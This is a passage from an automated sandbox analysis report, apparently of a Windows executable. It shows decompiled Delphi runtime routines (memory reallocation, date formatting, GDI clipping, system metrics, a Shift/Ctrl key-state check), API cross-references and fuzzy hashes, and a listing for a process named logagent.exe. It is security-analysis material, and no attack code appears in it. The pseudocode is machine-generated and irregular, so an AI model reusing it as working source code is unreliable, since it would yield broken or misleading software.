            _t153 = _t145 & 0xfffffff0;
            _push(__edi);
            _t182 = _t153 + __eax;
            _t154 = _t153 - 4;
            _t136 = _t145 & 0x0000000f;
            __eflags = __edx - _t154;
            if(__edx > _t154) {
                _t73 = *(_t182 - 4);
                __eflags = _t73 & 0x00000001;
                if((_t73 & 0x00000001) == 0) {
                    L51:
                    asm("adc edi, 0xffffffff");
                    _t198 = ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166;
                    _t184 = _t154;
                    _t80 = E00401820(((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166);
                    _t170 = _t166;
                    __eflags = _t80;
                    if(_t80 == 0) {
                        goto L49;
                    } else {
                        __eflags = _t198 - 0x40a2c;
                        if(_t198 > 0x40a2c) {
                            *((intOrPtr*)(_t80 - 8)) = _t170;
                        }
                        E00401570(_t196, _t184, _t80);
                        E00401B88(_t196, _t184);
                        return _t80;
                    }
                } else {
                    _t86 = _t73 & 0xfffffff0;
                    _t202 = _t154 + _t86;
                    __eflags = __edx - _t202;
                    if(__edx > _t202) {
                        goto L51;
                    } else {
                        __eflags = *0x46304d;
                        if(__eflags == 0) {
                            L42:
                            __eflags = _t86 - 0xb30;
                            if(_t86 >= 0xb30) {
                                E004015BC(_t182);
                                _t166 = _t166;
                                _t154 = _t154;
                            }
                            asm("adc edi, 0xffffffff");
                            _t94 = (_t166 + ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
                            _t173 = _t202 + 4 - _t94;
                            __eflags = _t173;
                            if(_t173 > 0) {
                                *(_t196 + _t202 - 4) = _t173;
                                *((intOrPtr*)(_t196 - 4 + _t94)) = _t173 + 3;
                                _t203 = _t94;
                                __eflags = _t173 - 0xb30;
                                if(_t173 >= 0xb30) {
                                    __eflags = _t94 + _t196;
                                    E004015FC(_t94 + _t196, _t154, _t173);
                                }
                            } else {
                                *(_t196 + _t202) = *(_t196 + _t202) & 0xfffffff7;
                                _t203 = _t202 + 4;
                            }
                            _t204 = _t203 | _t136;
                            __eflags = _t204;
                            *(_t196 - 4) = _t204;
                            *0x463718 = 0;
                            _t80 = _t196;
                            L49:
                            return _t80;
                        } else {
                            while(1) {
                                asm("lock cmpxchg [0x463718], ah");
                                if(__eflags == 0) {
                                    break;
                                }
                                Sleep(0);
                                _t166 = _t166;
                                _t154 = _t154;
                                asm("lock cmpxchg [0x463718], ah");
                                if(__eflags != 0) {
                                    Sleep(0xa);
                                    _t166 = _t166;
                                    _t154 = _t154;
                                    continue;
                                }
                                break;
                            }
                            _t136 = 0x0000000f & *(_t196 - 4);
                            _t100 = *(_t182 - 4);
                            __eflags = _t100 & 0x00000001;
                            if((_t100 & 0x00000001) == 0) {
                                L50:
                                *0x463718 = 0;
                                goto L51;
                            } else {
                                _t86 = _t100 & 0xfffffff0;
                                _t202 = _t154 + _t86;
                                __eflags = _t166 - _t202;
                                if(_t166 > _t202) {
                                    goto L50;
                                } else {
                                    goto L42;
                                }
                            }
                        }
                    }
                }
            } else {
                _t205 = __edx + __edx;
                __eflags = _t205 - _t154;
                if(_t205 < _t154) {
                    __eflags = __edx - 0xb2c;
                    if(__edx >= 0xb2c) {
                        L19:
                        _t16 = _t166 + 0xd3; // 0xbff
                        _t208 = (_t16 & 0xffffff00) + 0x30;
                        _t157 = _t154 + 4 - _t208;
                        __eflags = *0x46304d;
                        if(__eflags != 0) {
                            while(1) {
                                asm("lock cmpxchg [0x463718], ah");
                                if(__eflags == 0) {
                                    break;
                                }
                                Sleep(0);
                                _t157 = _t157;
                                asm("lock cmpxchg [0x463718], ah");
                                if(__eflags != 0) {
                                    Sleep(0xa);
                                    _t157 = _t157;
                                    continue;
                                }
                                break;
                            }
                            _t136 = 0x0000000f & *(_t196 - 4);
                            __eflags = 0xf;
                        }
                        *(_t196 - 4) = _t136 | _t208;
                        _t139 = _t157;
                        _t174 = *(_t182 - 4);
                        __eflags = _t174 & 0x00000001;
                        if((_t174 & 0x00000001) != 0) {
                            _t102 = _t182;
                            _t175 = _t174 & 0xfffffff0;
                            _t139 = _t139 + _t175;
                            _t182 = _t182 + _t175;
                            __eflags = _t175 - 0xb30;
                            if(_t175 >= 0xb30) {
                                E004015BC(_t102);
                            }
                        } else {
                            *(_t182 - 4) = _t174 | 0x00000008;
                        }
                        *((intOrPtr*)(_t182 - 8)) = _t139;
                        *((intOrPtr*)(_t196 + _t208 - 4)) = _t139 + 3;
                        __eflags = _t139 - 0xb30;
                        if(_t139 >= 0xb30) {
                            E004015FC(_t196 + _t208, _t157, _t139);
                        }
                        *0x463718 = 0;
                        return _t196;
                    } else {
                        __eflags = _t205 - 0xb2c;
                        if(_t205 < 0xb2c) {
                            _t190 = __edx;
                            _t111 = E00401820(__edx);
                            __eflags = _t111;
                            if(_t111 != 0) {
                                E004015A0(_t196, _t190, _t111);
                                E00401B88(_t196, _t190);
                            }
                            return _t111;
                        } else {
                            _t166 = 0xb2c;
                            goto L19;
                        }
                    }
                } else {
                    return __eax;
                }
            }
        }
    } else {
        _t141 = *_t145;
        _t160 = ( *(_t141 + 2) & 0x0000ffff) - 4;
        if(_t160 < __edx) {
            _push(__edi);
            _t193 = __edx;
            asm("adc eax, 0xffffffff");
            _t119 = E00401820((0 & _t160 + _t160 + 0x00000020 - __edx) + __edx);
            __eflags = _t119;
            if(_t119 != 0) {
                __eflags = _t193 - 0x40a2c;
                if(_t193 > 0x40a2c) {
                    *((intOrPtr*)(_t119 - 8)) = _t193;
                }
                __eflags = ( *(_t141 + 2) & 0x0000ffff) - 4;
                _t195 = _t119;
                *((intOrPtr*)(_t141 + 0x1c))();
                E00401B88(_t196, _t195);
                _t119 = _t195;
            }
            return _t119;
        } else {
            if(0x40 + __edx * 4 < _t160) {
                _t143 = __edx;
                _t125 = E00401820(__edx);
                __eflags = _t125;
                if(_t125 != 0) {
                    E004015A0(_t196, _t143, _t125);
                    E00401B88(_t196, __edi);
                    return _t125;
                }
                return _t125;
            } else {
                return __eax;
            }
        }
    }
}

                                                                            0x00401ec9
                                                                            0x00401eaf
                                                                            0x00401eb2
                                                                            0x00401eb2
                                                                            0x00401ece
                                                                            0x00401ed4
                                                                            0x00401ed8
                                                                            0x00401ede
                                                                            0x00401ee5
                                                                            0x00401ee5
                                                                            0x00401eea
                                                                            0x00401ef7
                                                                            0x00401e38
                                                                            0x00401e38
                                                                            0x00401e3e
                                                                            0x00401ef8
                                                                            0x00401efc
                                                                            0x00401f01
                                                                            0x00401f03
                                                                            0x00401f0d
                                                                            0x00401f14
                                                                            0x00401f14
                                                                            0x00401f1f
                                                                            0x00401e44
                                                                            0x00401e44
                                                                            0x00000000
                                                                            0x00401e44
                                                                            0x00401e3e
                                                                            0x00401e28
                                                                            0x00401e2c
                                                                            0x00401e2c
                                                                            0x00401e26
                                                                            0x00401e1b
                                                                            0x00401d78
                                                                            0x00401d78
                                                                            0x00401d7e
                                                                            0x00401d83
                                                                            0x00401dc0
                                                                            0x00401dc1
                                                                            0x00401dc7
                                                                            0x00401dce
                                                                            0x00401dd3
                                                                            0x00401dd5
                                                                            0x00401dd7
                                                                            0x00401ddd
                                                                            0x00401ddf
                                                                            0x00401ddf
                                                                            0x00401de6
                                                                            0x00401deb
                                                                            0x00401def
                                                                            0x00401df4
                                                                            0x00401df9
                                                                            0x00401df9
                                                                            0x00401dfe
                                                                            0x00401d85
                                                                            0x00401d8e
                                                                            0x00401d94
                                                                            0x00401d98
                                                                            0x00401d9d
                                                                            0x00401d9f
                                                                            0x00401da9
                                                                            0x00401db0
                                                                            0x00000000
                                                                            0x00401db5
                                                                            0x00401db9
                                                                            0x00401d92
                                                                            0x00401d92
                                                                            0x00401d92
                                                                            0x00401d8e
                                                                            0x00401d83

                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 028d8d3468e21b9f8e1c609a3c3ddb42240f5f23514891230630539b3f9fe126
                                                                            • Instruction ID: 6b3b6843e27bb62f7e5d94541143b704e997bbcd7bebc6a2cddc521959e2f60c
                                                                            • Opcode Fuzzy Hash: 028d8d3468e21b9f8e1c609a3c3ddb42240f5f23514891230630539b3f9fe126
                                                                            • Instruction Fuzzy Hash: C2A1F5637106004BD718AA7D9D8536EB3819BC5366F58823FF515EB3E2EB7C8D418289
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
E0040A67C(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
    char _v8;
    short _v18;
    short _v22;
    struct _SYSTEMTIME _v24;
    char _v280;
    intOrPtr _v284;
    char* _t34;
    intOrPtr* _t50;
    intOrPtr _t59;
    void* _t64;
    intOrPtr _t66;
    void* _t70;

    _v8 = 0;
    _t50 = __edx;
    _t64 = __eax;
    _push(_t70);
    _push(0x40a76a);
    _push( *[fs:eax]);
     *[fs:eax] = _t70 + 0xfffffee8;
    E0040473C(__edx);
    _v24 =  *(_a4 - 0xe) & 0x0000ffff;
    _v22 =  *(_a4 - 0x10) & 0x0000ffff;
    _v18 =  *(_a4 - 0x12) & 0x0000ffff;
    if(_t64 > 2) {
        E004047D4( &_v8, 0x40a78c);
    } else {
        E004047D4( &_v8, 0x40a780);
    }
    _t34 = E00404C00(_v8);
    if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t34,  &_v280, 0x100) != 0) {
        E004049AC(_t50, 0x100,  &_v280);
        if(_t64 == 1 &&  *((char*)( *_t50)) == 0x30) {
            _v284 =  *_t50;
            _t66 = _v284;
            if(_t66 != 0) {
                _t66 =  *((intOrPtr*)(_t66 - 4));
            }
            E00404C60( *_t50, _t66 - 1, 2, _t50);
        }
    }
    _pop(_t59);
     *[fs:eax] = _t59;
    _push(E0040A771);
    return E0040473C( &_v8);
}


                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040A76A), ref: 0040A702
                                                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040A76A), ref: 0040A708
                                                                            Strings
                                                                            • yyyy , xrefs: 0040A6DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: DateFormatLocaleThread
                                                                            • String ID: yyyy
                                                                            • API String ID: 3303714858-3145165042
                                                                            • Opcode ID: 6cf301cd4dbb5b34b884b87cd4e9d6bd7c982b661da83cb5c451281789fad814
                                                                            • Instruction ID: 8081e552295268892be29cc280909309cbc7073684cf05299d24970e3d403a10
                                                                            • Opcode Fuzzy Hash: 6cf301cd4dbb5b34b884b87cd4e9d6bd7c982b661da83cb5c451281789fad814
                                                                            • Instruction Fuzzy Hash: F12141756002189BDB11DBA5C982AAE73B8EF48700F5140B7F905F7381D738DE54D76A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 64%
E0043AD10(void* __eax, void* __ebx, void* __edi, void* __esi) {
    char _v8;
    char _v12;
    char _v16;
    intOrPtr _t31;
    void* _t36;
    intOrPtr _t42;
    struct HDC__* _t47;
    void* _t50;

    _push(__esi);
    _v16 = 0;
    _t36 = __eax;
    _push(_t50);
    _push(0x43ada6);
    _push( *[fs:eax]);
     *[fs:eax] = _t50 + 0xfffffff4;
    if( *((intOrPtr*)(__eax + 0x30)) == 0) {
        _v12 =  *((intOrPtr*)(__eax + 8));
        _v8 = 0xb;
        _t31 =  *0x462dec; // 0x423568
        E00406740(_t31,  &_v16);
        E0040C158(_t36, _v16, 1, __edi, __esi, 0,  &_v12);
        E00404184();
    }
    _t47 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x30)))) + 0x48))();
    SetViewportOrgEx(_t47,  *(_t36 + 0x40),  *(_t36 + 0x44), 0);
    IntersectClipRect(_t47, 0, 0,  *(_t36 + 0x48),  *(_t36 + 0x4c));
    _pop(_t42);
     *[fs:eax] = _t42;
    _push(0x43adad);
    return E0040473C( &_v16);
}


                                                                            APIs
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0043AD79
                                                                            • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0043AD8B
                                                                              • Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772
                                                                            Strings
                                                                            • h5B , xrefs: 0043AD46
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ClipIntersectLoadRectStringViewport
                                                                            • String ID: h5B
                                                                            • API String ID: 2734429277-2204541312
                                                                            • Opcode ID: 39734b3fce4a725eba0d90988523030e866c8d2b1382112e9c4397644d4563ed
                                                                            • Instruction ID: 1ef2c5308e92dbb7852dc5f6e9ef6c5674e045902edf6ecf16b6e61c915b5d41
                                                                            • Opcode Fuzzy Hash: 39734b3fce4a725eba0d90988523030e866c8d2b1382112e9c4397644d4563ed
                                                                            • Instruction Fuzzy Hash: 51114F71600204AFDB44DF58CC81FAA77A8EB49314F5040AAFE04DB291EB79AD10CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0043ADB8(void* __eflags, intOrPtr _a4) {
    signed char _v5;
    struct tagRECT _v21;
    struct tagRECT _v40;
    void* _t40;
    void* _t45;

    _v5 = 1;
    _t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x1cc));
    _t45 = E0041A868( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x1cc)),  *((intOrPtr*)(_a4 - 4)));
    if(_t45 <= 0) {
        L5:
        _v5 = 0;
    } else {
        do {
            _t45 = _t45 - 1;
            _t40 = E0041A80C(_t44, _t45);
            if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
                goto L4;
            } else {
                E0043A33C(_t40,  &_v40);
                IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
                if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
                    goto L4;
                }
            }
            goto L6;
            L4:
        } while (_t45 > 0);
        goto L5;
    }
    L6:
    return _v5 & 0x000000ff;
}


                                                                            APIs
                                                                            • IntersectRect.USER32 ref: 0043AE18
                                                                            • EqualRect.USER32 ref: 0043AE28
                                                                            Strings
                                                                            • @ , xrefs: 0043ADF9
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Rect$EqualIntersect
                                                                            • String ID: @
                                                                            • API String ID: 3291753422-2766056989
                                                                            • Opcode ID: e938c2b76a2eeda78225ce8cf867d930fa1488dbab9837213577f1d7a8766f1b
                                                                            • Instruction ID: 6e9426432a3e6fadb88004f381f8470911db4cd695cec418565dc038f1e98b7e
                                                                            • Opcode Fuzzy Hash: e938c2b76a2eeda78225ce8cf867d930fa1488dbab9837213577f1d7a8766f1b
                                                                            • Instruction Fuzzy Hash: 5811A031A442885BCB01DA6DC885BDF7BE89F49318F0442A6FC48EB382D779DE1587D5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00422DC8(int _a4) {
    void* __ebx;
    void* __ebp;
    signed int _t2;
    signed int _t3;
    int _t8;
    void* _t12;
    void* _t13;
    void* _t17;
    void* _t18;

    _t8 = _a4;
    if( *0x466338 == 0) {
         *0x466310 = E00422CE4(0, _t8,  *0x466310, _t17, _t18);
        return GetSystemMetrics(_t8);
    }
    _t3 = _t2 | 0xffffffff;
    _t12 = _t8 + 0xffffffb4 - 2;
    __eflags = _t12;
    if(__eflags < 0) {
        _t3 = 0;
    } else {
        if(__eflags == 0) {
            _t8 = 0;
        } else {
            _t13 = _t12 - 1;
            __eflags = _t13;
            if(_t13 == 0) {
                _t8 = 1;
            } else {
                __eflags = _t13 - 0xffffffffffffffff;
                if(_t13 - 0xffffffffffffffff < 0) {
                    _t3 = 1;
                }
            }
        }
    }
    __eflags = _t3 - 0xffffffff;
    if(_t3 != 0xffffffff) {
        return _t3;
    } else {
        return GetSystemMetrics(_t8);
    }
}


                                                                            APIs
                                                                            • GetSystemMetrics.USER32 ref: 00422E2A
                                                                              • Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63
                                                                            • GetSystemMetrics.USER32 ref: 00422DF0
                                                                            Strings
                                                                            • GetSystemMetrics , xrefs: 00422DD8
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MetricsSystem$AddressProc
                                                                            • String ID: GetSystemMetrics
                                                                            • API String ID: 1792783759-96882338
                                                                            • Opcode ID: c25a38d46c1e4ffea5b60ab85707767b0b04cc81a25b6e54c2e579306e5f87fa
                                                                            • Instruction ID: 5fc931f2355d86599297f92dc66c6923be0ac5e92dc587121fe74810b58b28c3
                                                                            • Opcode Fuzzy Hash: c25a38d46c1e4ffea5b60ab85707767b0b04cc81a25b6e54c2e579306e5f87fa
                                                                            • Instruction Fuzzy Hash: A5F062307141507ACA254A38BE842267546AB45330FE25B37E5229A2D5DFFC8C91A25E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 61%
                                                                            E0043369C(void* __eax) {
                                                                                signed char _v17;
                                                                                signed char _v24;
                                                                                signed int _t8;

                                                                                asm("movsd");
                                                                                asm("movsd");
                                                                                asm("movsd");
                                                                                asm("movsd");
                                                                                _t8 = _v24 & 0x000000ff;
                                                                                if(_t8 != 0) {
                                                                                    /* 0x10 is VK_SHIFT; a negative return means the key is down */
                                                                                    if(GetKeyState(0x10) < 0) {
                                                                                        _t8 = _t8 + 0x2000;
                                                                                    }
                                                                                    /* 0x11 is VK_CONTROL */
                                                                                    if(GetKeyState(0x11) < 0) {
                                                                                        _t8 = _t8 + 0x4000;
                                                                                    }
                                                                                    if((_v17 & 0x00000020) != 0) {
                                                                                        _t8 = _t8 + 0x8000;
                                                                                    }
                                                                                }
                                                                                return _t8;
                                                                            }


                                                                            APIs
                                                                            • GetKeyState.USER32(00000010), ref: 004336B7
                                                                            • GetKeyState.USER32(00000011), ref: 004336C8
                                                                            Strings
                                                                            • , xrefs: 004336D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: State
                                                                            • String ID:
                                                                            • API String ID: 1649606143-3916222277
                                                                            • Opcode ID: 214cf5a452d32b715b633cccca3f99564eca22495acae71db1ba112392d63aef
                                                                            • Instruction ID: 8f684c87d4741464f805386feb5dbb40cfecca0e0810653843f36d644f5af4db
                                                                            • Opcode Fuzzy Hash: 214cf5a452d32b715b633cccca3f99564eca22495acae71db1ba112392d63aef
                                                                            • Instruction Fuzzy Hash: 6FE02B2270464226E62179552C063D713904F417A9F0D066BBDC42B2C2D29F0B1550AA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Analysis Process: logagent.exe PID: 6664 Parent PID: 5352

                                                                            Executed Functions

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F991A
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: bad0ff05137418b64c42b86367529988bf70abdb93236c477866ac7c7f041382
                                                                            • Instruction ID: 265114da11572675a009b4c60de04f7c5209ed21241de56456dd5cc878fff7ac
                                                                            • Opcode Fuzzy Hash: bad0ff05137418b64c42b86367529988bf70abdb93236c477866ac7c7f041382
                                                                            • Instruction Fuzzy Hash: D79002B160100402D54571D956047460005A7D0341F51C015A5055558EC7D98DD576A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F954A
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: dcf73ab426b28c8d3f8806f65fc9a9fc06209ce2fa0aaecf9b931409b7830c57
                                                                            • Instruction ID: eef160581ece5b6be39f329254e7ca12e782575019b5e42257213824cc635a55
                                                                            • Opcode Fuzzy Hash: dcf73ab426b28c8d3f8806f65fc9a9fc06209ce2fa0aaecf9b931409b7830c57
                                                                            • Instruction Fuzzy Hash: 6D90027561100003050AA5D917045070046A7D5391351C025F1006554CD7E188616161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F99AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b89eb39028ab5688f1c13e5ebfeed3a169d6bf664db608fb19342296e5f9d237
                                                                            • Instruction ID: 1a25c1cd16a0f53fcd72a902df21b4954b81522da5dc6dd3ad8e1f5b08c02d70
                                                                            • Opcode Fuzzy Hash: b89eb39028ab5688f1c13e5ebfeed3a169d6bf664db608fb19342296e5f9d237
                                                                            • Instruction Fuzzy Hash: A99002B174100442D50561D95614B060005E7E1341F51C019E1055558DC7D9CC527166
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F95DA
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: bd2160619b82b92714bb2e10b999cb03e34529efa7192ef7415b4f0e3fcaed10
                                                                            • Instruction ID: 130cf6fc6214e052c402c45bf80025f77f0b1ee50206669c17a22e58264cf936
                                                                            • Opcode Fuzzy Hash: bd2160619b82b92714bb2e10b999cb03e34529efa7192ef7415b4f0e3fcaed10
                                                                            • Instruction Fuzzy Hash: 739002B160200003450A71D95614616400AA7E0341B51C025E1005594DC6E588917165
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F984A
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: a079af71d39ca0d1c7fa066df97dba45dcbd574263a389df9a64a94053acb7ca
                                                                            • Instruction ID: 12d67d3d0da063a5779bd8177e8d1d94c4a6225134e3b3ba30625b12f43570b1
                                                                            • Opcode Fuzzy Hash: a079af71d39ca0d1c7fa066df97dba45dcbd574263a389df9a64a94053acb7ca
                                                                            • Instruction Fuzzy Hash: 6A90027164204152594AB1D956045074006B7E0381791C016A1405954CC6E69856E661
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F986A
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: c40ff2ce8562ae2d7a663e391c8ba0778b54205705c6d283900e1edfe2a0eb40
                                                                            • Instruction ID: bdadd4f54973eeff8de63a5ac9665d15b518fae19f28cb2be87a7c9b53f86656
                                                                            • Opcode Fuzzy Hash: c40ff2ce8562ae2d7a663e391c8ba0778b54205705c6d283900e1edfe2a0eb40
                                                                            • Instruction Fuzzy Hash: 4290027160100413D51661D957047070009A7D0381F91C416A041555CDD7D68952B161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F98FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 78a6abfc8e95a8e96bfac8645358cde481a3ca74c4aea027fa29cfb8d109ac2e
                                                                            • Instruction ID: d2d954934aa6753a116697e5796cbca5cb7651a7201f10ca7ca7bd56da468612
                                                                            • Opcode Fuzzy Hash: 78a6abfc8e95a8e96bfac8645358cde481a3ca74c4aea027fa29cfb8d109ac2e
                                                                            • Instruction Fuzzy Hash: A2900271A0100502D50671D95604616000AA7D0381F91C026A1015559ECBE58992B171
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F971A
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 12c26b61616d292c9640572a4f45e45c60306d9ce40f5c2f4f573c19b6abc390
                                                                            • Instruction ID: 325e81858735b0ecf23ace190357220518b4a77dabfe72e4ea435a705170d1d7
                                                                            • Opcode Fuzzy Hash: 12c26b61616d292c9640572a4f45e45c60306d9ce40f5c2f4f573c19b6abc390
